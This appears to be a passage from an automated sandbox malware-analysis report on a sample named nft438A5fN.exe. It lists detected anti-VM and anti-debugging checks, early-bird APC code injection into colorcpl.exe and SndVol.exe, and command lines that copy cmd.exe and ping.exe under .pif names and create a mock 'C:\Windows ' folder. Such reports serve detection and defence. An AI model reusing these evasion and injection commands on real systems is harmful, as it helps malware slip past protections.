Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Delayed program exit found

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0320F7E2 Sleep,ExitProcess,		11_2_0320F7E2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E8F7E2 Sleep,ExitProcess,		21_2_02E8F7E2

Contains functionality to enumerate running services

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,		11_2_0321A7D9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,		21_2_02E9A7D9

Found large amount of non-executed APIs

Source: C:\Users\Public\alpha.pif	API coverage: 6.3 %
Source: C:\Windows\SysWOW64\colorcpl.exe	API coverage: 4.9 %
Source: C:\Users\Public\alpha.pif	API coverage: 7.7 %
Source: C:\Windows\SysWOW64\colorcpl.exe	API coverage: 4.9 %

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\Public\xpha.pif	Last function: Thread delayed

Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02C95908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,	0_2_02C95908
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00050207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,	7_2_00050207
Source: C:\Users\Public\alpha.pif	Code function: 7_2_0005589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,	7_2_0005589A
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00063E66 FindFirstFileW,FindNextFileW,FindClose,	7_2_00063E66
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00054EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	7_2_00054EC1
Source: C:\Users\Public\alpha.pif	Code function: 7_2_0004532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,	7_2_0004532E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0321C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	11_2_0321C322
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0320C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	11_2_0320C388
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0320928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	11_2_0320928E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_032096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	11_2_032096A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0320BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	11_2_0320BB6B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_03219B86 FindFirstFileW,FindNextFileW,FindNextFileW,	11_2_03219B86
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_03207877 FindFirstFileW,FindNextFileW,	11_2_03207877
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_03208847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	11_2_03208847
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0324E8F9 FindFirstFileExA,	11_2_0324E8F9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0320BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	11_2_0320BD72
Source: C:\Users\Public\alpha.pif	Code function: 15_2_0005589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,	15_2_0005589A
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00050207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,	15_2_00050207
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00063E66 FindFirstFileW,FindNextFileW,FindClose,	15_2_00063E66
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00054EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	15_2_00054EC1
Source: C:\Users\Public\alpha.pif	Code function: 15_2_0004532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,	15_2_0004532E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E8928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	21_2_02E8928E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E8C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	21_2_02E8C388
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E9C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	21_2_02E9C322
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E896A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	21_2_02E896A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E99B86 FindFirstFileW,FindNextFileW,FindNextFileW,	21_2_02E99B86
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E8BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	21_2_02E8BB6B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02ECE8F9 FindFirstFileExA,	21_2_02ECE8F9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E87877 FindFirstFileW,FindNextFileW,	21_2_02E87877
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E88847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	21_2_02E88847
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E8BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	21_2_02E8BD72

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 11_2_03207CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

11_2_03207CD2

Source: Amcache.hve.14.dr	Binary or memory string: VMware
Source: Amcache.hve.14.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.14.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.14.dr	Binary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
Source: Amcache.hve.14.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.14.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.14.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.14.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.14.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: nft438A5fN.exe, 00000000.00000002.1611613314.000000000085B000.00000004.00000020.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1611613314.000000000080E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.14.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.14.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.14.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.14.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: xpha.pif, 00000010.00000002.1713024647.0000000002590000.00000004.00000020.00020000.00000000.sdmp, Wuqtggvo.PIF, 00000013.00000002.1713335088.000000000070E000.00000004.00000020.00020000.00000000.sdmp, Wuqtggvo.PIF, 0000001F.00000002.1804537208.0000000000618000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.14.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.14.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.14.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.14.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.14.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.14.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.14.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.14.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.14.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.14.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.14.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.14.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.14.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.14.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.14.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.14.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\nft438A5fN.exe

API call chain: ExitProcess graph end node

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\nft438A5fN.exe

Code function: 0_2_02CAF744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,

0_2_02CAF744

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\nft438A5fN.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\colorcpl.exe	Process queried: DebugPort
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process queried: DebugPort
Source: C:\Windows\SysWOW64\SndVol.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\SndVol.exe	Process queried: DebugPort

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 11_2_0320F3FE LdrInitializeThunk,

11_2_0320F3FE

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\Public\alpha.pif

Code function: 7_2_00062E37 IsDebuggerPresent,

7_2_00062E37

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\nft438A5fN.exe

Code function: 0_2_02CA894C LoadLibraryW,GetProcAddress,FreeLibrary,

0_2_02CA894C

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02D5A8E5 mov eax, dword ptr fs:[00000030h]	0_2_02D5A8E5
Source: C:\Users\Public\alpha.pif	Code function: 7_2_0006C1FA mov eax, dword ptr fs:[00000030h]	7_2_0006C1FA
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_03243355 mov eax, dword ptr fs:[00000030h]	11_2_03243355
Source: C:\Users\Public\alpha.pif	Code function: 15_2_0006C1FA mov eax, dword ptr fs:[00000030h]	15_2_0006C1FA
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02EC3355 mov eax, dword ptr fs:[00000030h]	21_2_02EC3355

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\Public\alpha.pif

Code function: 7_2_0004A9D4 GetEnvironmentStringsW,GetProcessHeap,RtlAllocateHeap,memcpy,FreeEnvironmentStringsW,

7_2_0004A9D4

Source: C:\Users\Public\alpha.pif	Code function: 7_2_00056EC0 SetUnhandledExceptionFilter,	7_2_00056EC0
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00056B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_00056B40
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0323503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_0323503C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0323BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_0323BB71
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_03234BD8 SetUnhandledExceptionFilter,	11_2_03234BD8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_03234A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_03234A8A
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00056EC0 SetUnhandledExceptionFilter,	15_2_00056EC0
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00056B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	15_2_00056B40
Source: C:\Users\Public\xpha.pif	Code function: 16_2_000F3600 SetUnhandledExceptionFilter,	16_2_000F3600
Source: C:\Users\Public\xpha.pif	Code function: 16_2_000F3470 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	16_2_000F3470
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02EB503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	21_2_02EB503C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02EB4A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_02EB4A8A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02EB4BD8 SetUnhandledExceptionFilter,	21_2_02EB4BD8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02EBBB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_02EBBB71

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Users\user\Desktop\nft438A5fN.exe	Process created / APC Queued / Resumed: C:\Windows\SysWOW64\colorcpl.exe	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process created / APC Queued / Resumed: C:\Windows\SysWOW64\colorcpl.exe	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process created / APC Queued / Resumed: C:\Windows\SysWOW64\SndVol.exe

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\nft438A5fN.exe	Memory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 3200000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Memory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 2E80000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Memory allocated: C:\Windows\SysWOW64\SndVol.exe base: 3290000 protect: page execute and read and write

Drops or copies cmd.exe with a different name (likely to bypass HIPS)

Source: C:\Windows\SysWOW64\esentutl.exe

File created: C:\Users\Public\alpha.pif

Jump to dropped file

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\nft438A5fN.exe

Thread APC queued: target process: C:\Windows\SysWOW64\colorcpl.exe

Jump to behavior

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe		11_2_03212132
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe		21_2_02E92132

Contains functionality to simulate mouse events

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 11_2_03219662 mouse_event,

11_2_03219662

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\nft438A5fN.exe	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"	Jump to behavior
Source: C:\Users\Public\alpha.pif	Process created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\nft438A5fN.exe

Code function: 0_2_02D4C246 cpuid

0_2_02D4C246

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_02C95ACC
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: GetLocaleInfoA,	0_2_02C9A7C4
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: GetLocaleInfoA,	0_2_02C9A810
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_02C95BD8
Source: C:\Users\Public\alpha.pif	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	7_2_00048572
Source: C:\Users\Public\alpha.pif	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,	7_2_00046854
Source: C:\Users\Public\alpha.pif	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	7_2_00049310
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,	11_2_03252393
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	11_2_03252143
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	11_2_0325201B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	11_2_032520B6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	11_2_03252690
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,	11_2_032525C3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	11_2_032524BC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	11_2_03248484
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoA,	11_2_0320F90C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,	11_2_0324896D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	11_2_03251FD0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	11_2_03251D58
Source: C:\Users\Public\alpha.pif	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	15_2_00048572
Source: C:\Users\Public\alpha.pif	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,	15_2_00046854
Source: C:\Users\Public\alpha.pif	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	15_2_00049310
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,	21_2_02ED2393
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	21_2_02ED20B6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	21_2_02ED201B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	21_2_02ED2143
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	21_2_02ED2690
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	21_2_02ED24BC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	21_2_02EC8484
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,	21_2_02ED25C3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,	21_2_02EC896D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoA,	21_2_02E8F90C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	21_2_02ED1FD0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	21_2_02ED1D58

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\alpha.pif	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\nft438A5fN.exe

Code function: 0_2_02C9920C GetLocalTime,

0_2_02C9920C

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 11_2_0321B69E GetUserNameW,

11_2_0321B69E

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 11_2_032493E5 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

11_2_032493E5

Source: C:\Users\user\Desktop\nft438A5fN.exe

Code function: 0_2_02C9B78C GetVersionExA,

0_2_02C9B78C

AV process strings found (often used to terminate AV products)

